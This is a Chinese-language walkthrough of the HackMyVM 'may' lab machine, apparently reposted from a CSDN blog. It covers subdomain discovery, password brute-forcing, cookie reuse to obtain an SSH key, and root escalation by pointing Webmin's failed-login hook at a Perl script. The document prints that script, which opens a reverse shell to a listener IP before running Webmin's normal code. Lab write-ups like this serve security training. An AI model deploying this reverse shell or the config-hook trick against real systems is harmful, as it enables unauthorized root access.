当前位置:网站首页>hackmyvm: may walkthrough

hackmyvm: may walkthrough

2022-08-02 03:25:00 xdeclearn

hackmyvm: may walkthrough

信息收集

port
访问80,会跳转到域名may.hmv访问,这里需添加hosts访问。
user
得到了一个用户明marie
爆破目录未果,于是爆破vhost。
vhost
找到两个vhost,portalssh。添加hosts后访问portal.may.hmv。这个一个登录页面,会验证用户名和密码,尝试注入失败后,利用前面得到的用户名尝试爆破密码。
pass
得到密码rebelde并成功获取到了cookie,将这个cookie注入到http://ssh.may.hmv/check.php的请求中去,成功获取marie用户的私钥。
id_rsa

获取user flag

将私钥保存,并设置为只可当前用户读写,ssh登录marie
mariessh
userflag

获取root flag

查看root用户进程,发现了如下进程。
webmin
查看miniserv.conf文件权限,发现marie可以直接编辑,于是在home目录下创建一个failed.pl替换掉默认的。

miniserv
modifyminiserv
failed.pl中加入了反弹shell代码。

[email protected]:~$ cat failed.pl 
#!/usr/bin/perl
use Socket;$i="192.168.143.135";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
    open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!";
while(<CONF>) {
    
        $root = $1 if (/^root=(.*)/);
        }
close(CONF);
$root || die "No root= line found in /etc/webmin/miniserv.conf";
$ENV{
    'PERLLIB'} = "$root";
$ENV{
    'WEBMIN_CONFIG'} = "/etc/webmin";
$ENV{
    'WEBMIN_VAR'} = "/var/webmin";
delete($ENV{
    'MINISERV_CONFIG'});
chdir("$root");
exec("$root/record-failed.pl", @ARGV) || die "Failed to run $root/record-failed.pl : $!";

利用sudo重启虚拟机(marie可以无密码执行sudo reboot)。重启后随便webmin登录一个错误账号就可以反弹root。
rootflag

原网站

版权声明
本文为[xdeclearn]所创,转载请带上原文链接,感谢
https://blog.csdn.net/xdeclearn/article/details/119642058

边栏推荐

猜你喜欢

随机推荐